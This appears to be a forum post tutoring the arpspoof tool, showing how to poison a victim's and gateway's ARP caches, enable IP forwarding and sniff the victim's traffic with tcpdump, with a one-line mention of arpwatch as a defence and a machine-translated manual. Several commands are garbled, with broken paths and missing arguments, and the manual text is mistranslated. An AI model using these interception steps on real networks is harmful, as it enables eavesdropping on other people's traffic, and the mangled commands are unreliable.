Arpspoof

Mutt

Professional
Messages
1,457
Reaction score
1,266
Points
113
21029339-e113-45f0-beb7-ab90ea8675fc.jpeg


Good day, today we will consider the arpspoof tool.

arpspoof captures packets on a switched LAN. arpspoof redirects packets from a target host (or all hosts) on the local network to another host on the local network by spoofing ARP responses. This is a very efficient way to sniff traffic on the switch.
IP forwarding by the kernel (or a user environment program that does the same, such as fragrouter) must be enabled beforehand.
Homepage: https://github.com/smikims/arpspoof

The program is preinstalled in Kali Linux.

Usage:
Code:
arpspoof [-i interface] [-c own | host | both] [-t target] [-r] host

Arpspoof launch examples
To tell the victim's host that we (our MAC address) are now one of the gateway's IPs, enter the following command:
Code:
arpspoof -t victim

In a separate shell, we will run the appropriate command to fool the gateway into believing that we are the victim:
Code:
arpspoof -t victim_gateway

Remember to enable IP forwarding on your host so that traffic leaves your host. Otherwise, the victim will lose the connection.
Code:
echo 1> / proc / sys / net / ipv4 / ip_forward

Now to view all traffic between the victim's host and the external network going through your machine
Code:
tcpdump victim_host_and_not_arp

Fighting arpspoof
Use tools like arpwatch to monitor MAC / IP table changes.

Arpspoof manual
Code:
OPTIONS
-i interface
Specifies the interface to use.

-c own | host | both
Determines which hardware address t to use when restoring arp configuration; during cleaning, the bags may be
sent with their own address as well as with the host address. Sending packets with a fake hardware address can destroy
connecting to a specific switch / application / bridge configuration, however, it works more reliably than using
own address, which is the default way to clean up arpspoof afterwards.

-t target
Specifies a specific host for ARP poison (if not specified, all hosts on the local network). Repeat to set up multiple hosts.

-r Spoof both hosts (host and target) to capture traffic in both directions. (only valid when paired with -t)

host Specifies the host on which you want to capture packets (usually the local gateway).
 
Top